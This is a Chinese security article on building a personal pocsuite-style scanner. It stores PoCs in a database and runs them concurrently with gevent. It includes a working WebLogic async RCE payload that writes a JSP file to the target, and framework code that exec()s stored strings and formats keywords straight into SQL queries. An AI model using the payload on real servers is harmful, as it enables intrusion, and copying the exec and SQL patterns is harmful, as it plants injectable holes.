29

100行代码手撸一个个人版“pocsuite”

 4 years ago
source link: https://www.freebuf.com/sectool/220998.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

距离笔者在gayhub发布“AngelSword”这款工具已有两年时间,这期间来有不少人star和fork,同时也有很多人发私信提供建议,也是在最近半年多这个项目已经不再维护,因为时间原因不再继续添加poc,最主要原因是觉得这个项目写的并不美观且功能不够强大,所以才有了这篇文章。

0×01 另起炉灶

有了推翻了重来的想法,接着就构思这个框架到底是怎样的:

1.poc代码不存文件,用到的时候直接检测出结果。
2.只要给出关键字,自动化搜索相关的poc轮询调用。
3.web层漏洞和主机层漏洞检测分离。

按照这些思路开始怼代码,先定义数据结构:建立webexploit数据表内容如下,vulname设置为主键,poc列中存储检测代码。

3iyqqe2.jpg!web

demo poc代码如下:

def _verify(url, cookies, uagent, vulns, proxy):
    pocdict = {
        "vulnname":"weblogic_wls_async_rce",
        "isvul": False,
        "vulnurl":"",
        "payload":"",
        "proof":"",
        "response":"",
        "exception":"",
    }
    headers = {
        "User-Agent" : uagent,
        "Content-Type": 'text/xml',
    }
    time_stamp = time.mktime(datetime.datetime.now().timetuple())
    m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
    md5_str = m.hexdigest()
    payload = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{0}.jsp</string><void method="println"><string><![CDATA[56540676a129760a3]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'.format(md5_str)
    try:
        vurl = urllib.parse.urljoin(url, '_async/AsyncResponseService')
        req = requests.post(vurl, data=payload, cookies=cookies, headers=headers, timeout=15, verify=False, proxies=proxy)
        time.sleep(5)
        rurl = urllib.parse.urljoin(url, 'bea_wls_internal/{0}.jsp'.format(md5_str))
        reqr = requests.get(rurl, timeout=10, verify=False)
        if r"56540676a129760a3" in reqr.text:
            pocdict['isvul'] = True
            pocdict['vulnurl'] = vurl
            pocdict['payload'] = payload
            pocdict['proof'] = rurl
            pocdict['response'] = reqr.text

    except Exception as e:
        pocdict['exception'] = str(e)
    vulns.append(pocdict)
_verify(self.url, self.cookies, findProxy().randomUA(), self.vulns, self.proxynode)     

poc代码存入数据库,每个poc都只有一个_verify函数,接受的参数来源于pocfactory类自身变量(后面说),程序执行完把结果存到字典最后再把字典放入列表,列表的功能当然就是为了遍历(配合协程并发)。

0×02 控制poc调度

poc调度主要有以下几种,如图所示:

1)单一poc->单一目标
2)单一poc->多个目标
3)多个poc->单一目标
4)多个poc->多个目标

UZ7FNvN.jpg!web

为了增加速度,往往会使用threading库或者gevent库,这里首选gevent,之前测试过在高并发的情况下协程要比多线程的效率高一些。

接着编写pocfactory类,定义一些初始化变量,可以从外部动态设置参数(例如cookies或者自定义线程数),loadmodule函数的功能是把所有poc需要用到的导入模块一次性导入,这样后续每次执行poc就不需要为缺少模块而发愁了。

rqIriqn.jpg!web

然后就是编写执行poc模块的函数runpocwithcmsname,这个函数接受一个keyword参数,然后从数据库中把所有匹配到keyword的poc代码全部拉出存储到poclist列表,最后再用协程并发执行pocexec函数,执行之后的结果都在self.vulns列表里,依次插入数据库。

fmuQVbM.jpg!web

到这里只有几十行代码就可以把搜索出来的poc一次性调度完,这样就完成了单一poc->单一目标和多个poc->单一目标。如果有不明白pocexec这个函数的作用可以参考我之前写过的一篇文章: pocsuite框架代码解析 。而要增加多目标就比较容易了,这里我测试了两种方法:多进程+协程,协程+协程,最后得出的结果是在时间开销上只用协程要比多进程+协程还要高效,然后就有了下面的代码。

iieaaia.jpg!web

nYRzUjF.jpg!web

为了能够清晰的显示执行poc的结果详细情况,我又用logbook模块写了一个日志类:

class mylog:
    def __init__(self, logname, toscreen=False):
        # 设置日志名称        
        self.logname = logname
        self.toscreen = toscreen
        # 设置日志目录        
        self.LOG_DIR = self.setpath()
        # 设置本地时间        
        logbook.set_datetime_format("local")
        # 设置终端输出格式        
        self.log_standard = ColorizedStderrHandler(bubble=True)
        self.log_standard.formatter = self.logformat
        # 设置文件输出格式        
        self.log_file = TimedRotatingFileHandler(
            os.path.join(self.LOG_DIR, '{}.log'.format(self.logname)), date_format='%Y-%m-%d', bubble=True, encoding='utf-8')
        self.log_file.formatter = self.logformat
        # 执行log记录        
        self.log = Logger("SatanLogging")
        self.logrun()

    """    日志存储函数    """    
    def setpath(self):
        logpath = os.path.join(GlobalConf().progpath['location'], 'Backtracking/log')
        if not os.path.exists(logpath):
            os.makedirs(logpath)
        return logpath

    """    格式化日志函数    """    
    def logformat(self, record, handler):
        log = "[{date}] [{level}] [{filename}] [{func_name}] [{lineno}] {msg}".format(
         # 日志时间            
        date=record.time,            
         # 日志等级            
        level=record.level_name,            
         # 文件名            
        filename=os.path.split(record.filename)[-1],            
         # 函数名            
        func_name=record.func_name,            
         # 行号            
        lineno=record.lineno,            
         # 日志内容            
        msg=record.message
        )
        return log

    """    生成日志函数    """    
    def logrun(self):
        self.log.handlers = []
        self.log.handlers.append(self.log_file)
        # 如果为True将日志打到屏幕        if self.toscreen:
            self.log.handlers.append(self.log_standard)        

0×03 测试检测结果

这样基本骨架算是写完了,然后测试一下效果,目标是笔者跟朋友借的一台存在漏洞的weblogic。

NJZnuqq.jpg!web

在数据库中查看检测结果。

fAZJFje.jpg!web

在log文件中查看检测结果,其实跟数据库中的结果大致差不多,只是response内容写进了日志而没有写进数据库。

目前针对web漏洞的poc框架的雏形已经完全写完了,核心代码只有50多行,而针对主机层的漏洞poc也采用相同的调用结构,只不过一次性导入模块可能略有区别。

reUVNjf.jpg!web

还有个区别就是如果一次性发送大量请求给web服务器,每个请求都相对独立,可以说是请求的结果都相对符合预期。但是如果是主机层面的,可能一个完整的检测过程是通过好几次发包来获取结果,如果高并发的情况下会破坏socket包请求序列,这就导致有些存在漏洞的目标但是你的poc并没有检测出漏洞。所以针对主机层漏洞采用的是队列的方式,设置阻塞,当多个poc攻击一个目标的时候,让每个poc都呈现“排队”模式。

def Consumer(self, pocstr):

while not self.queue.empty():

data = self.queue.get()

sem.acquire()

exec(data)

gevent.sleep(0)

sem.release()

def runpocwithsysname(self, keyword):

try:

poclist = list()

self.loadmodule()

sql = 'SELECT poc from hostexploit WHERE vulname like "%{}%"'.format(keyword)

res = db().execute(sql)

for item in res:

poclist.append(item['poc'])

self.queue.put_nowait(item['poc'])

mylog('hostexploit', True).log.info(pyfancy().green('[+]针对目标:{0}:{1} 加载{2} hostpoc {3}个'.format(self.host, self.port, keyword, len(poclist))))

threads = [gevent.spawn(self.Consumer, item) for item in poclist]

gevent.joinall(threads)

虽然用队列把多个poc对单一目标的检测给阻塞了,时间开销变大了,但是单一poc对多个目标或多个poc对多个目标发起的请求还是高并发的。

总而言之以上这些只是一个比较完整的架子,至于最基本的还是poc的累积,而自定义的poc模板也尽量是代码能少则少,只要一个函数就可以把漏洞检测出来。当然你也可以在_verify函数里写复杂的类或者函数,实践证明也是没问题的。 对于需要引入外部平台检测的,额外写个GlobalConf类,里面定义好接口地址,这些只要进入交互式终端自动加载进去就OK了。

IvaQ7zu.jpg!web

0×04 总结&整理

虽然笔者起的名字叫100行。。。。这里的100行代码只是指核心代码,而加上数据库管理的,poc代码的和各种巴拉巴拉设置的恐怕也要超过几千行了,核心代码笔者已经上传到gayhub,可供大家参考拍砖。

*本文原创作者:六翼,本文属于FreeBuf原创奖励计划,未经许可禁止转载


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK